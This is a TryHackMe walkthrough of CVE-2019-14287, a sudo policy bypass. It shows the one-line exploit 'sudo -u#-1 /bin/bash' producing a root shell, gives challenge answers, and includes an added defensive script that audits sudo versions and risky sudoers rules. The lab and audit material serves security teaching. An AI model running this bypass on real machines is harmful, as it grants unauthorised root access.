THM Sudo Security Bypass

SUDO Security Bypass ~ TryHackMe

Irshad Ahamed
Aug 16, 2020

A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series.

TryHackMe room link:

My THM account :)

Hola F0lk5, this THM room is quite simple and covers an important vulnerability in the Unix sudo program that is worth noting. Let’s get in.

Task 1: Deploy!

This room can be done by SSHing into the given IP with the creds given in Task 2.

Task 2: Security Bypass

The sudo vulnerability CVE-2019-14287 is a security policy bypass that lets a user or a program execute commands as root on a Linux system even when the sudoers configuration explicitly disallows root access. Exploiting the vulnerability requires the user to have sudo privileges that allow them to run commands as an arbitrary user ID, except root.

This room was created to raise awareness of this vulnerability; it has no other interesting challenges.

Vulnerable sudo program version: ‘< 1.8.28’

POC: “sudo -u#-1 <command>”

Example:

tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
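
A defender-side check for the two preconditions described above (sudo older than 1.8.28 and a rule that allows running as any user except root), added here as an example that is not part of the original writeup or the room. The `(ALL, !root)` rule form, the function names and the sample sudoers lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: defensive audit for exposure to CVE-2019-14287.

# Return 0 (true) when the given sudo version string is older than 1.8.28.
sudo_version_vulnerable() {
    ver=${1%%[!0-9.]*}                      # "1.8.21p2" -> "1.8.21"
    IFS=. read -r major minor patch rest <<EOF
$ver
EOF
    major=${major:-0}; minor=${minor:-0}; patch=${patch:-0}
    if   [ "$major" -ne 1 ]; then [ "$major" -lt 1 ]
    elif [ "$minor" -ne 8 ]; then [ "$minor" -lt 8 ]
    else [ "$patch" -lt 28 ]
    fi
}

# Read sudoers text on stdin and print non-comment lines whose Runas list
# grants ALL users and then excludes root by negation, e.g. "(ALL, !root)".
# Returns 0 when at least one such rule is found.
risky_runas_rules() {
    grep -v '^[[:space:]]*#' |
        grep -E '\([^)]*ALL[^)]*![[:space:]]*(root|#0)'
}

# audit VERSION < sudoers-text : print a one-word verdict plus matching rules.
audit() {
    if rules=$(risky_runas_rules); then rule=yes; else rule=no; fi
    if sudo_version_vulnerable "$1"; then old=yes; else old=no; fi
    case "$old/$rule" in
        yes/yes) printf 'EXPOSED\n%s\n' "$rules" ;;   # both preconditions met
        yes/no)  printf 'UPGRADE\n' ;;                # old sudo, no such rule
        no/yes)  printf 'REVIEW\n%s\n' "$rules" ;;    # fixed sudo, rule present
        no/no)   printf 'OK\n' ;;
    esac
}

# Constructed sample sudoers content (not taken from the room's machine).
SAMPLE_SUDOERS='root      ALL=(ALL:ALL) ALL
tryhackme ALL=(ALL, !root) /bin/bash
deploy    ALL=(www-data) /usr/bin/systemctl restart app
# backup  ALL=(ALL, !root) /usr/bin/rsync'

# Demo on the sample; on a real host use:
#   audit "$(sudo -V | awk 'NR==1 {print $3}')" < /etc/sudoers
printf '%s\n' "$SAMPLE_SUDOERS" | audit "1.8.21p2"
```

Upgrading sudo to 1.8.28 or later removes the bypass; the REVIEW verdict flags rules worth rewriting as an explicit list of allowed target users.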

Challenges:

#1. What command are you allowed to run with sudo?
Ans: /bin/bash

#2. What command are you allowed to run with sudo?
Ans: THM{l33t_********_bypass}

Tip: Refer to question #1 and the example.

This is a simple walkthrough room; writeups for more interesting challenge rooms are coming soon! Thanks to the content creators of THM!!!

Give a clap to motivate me to try harder rooms! :)

Follow me on:

www.linkedin.com/in/irshad101

Written by Irshad Ahamed

Independent CyberSecurity Researcher
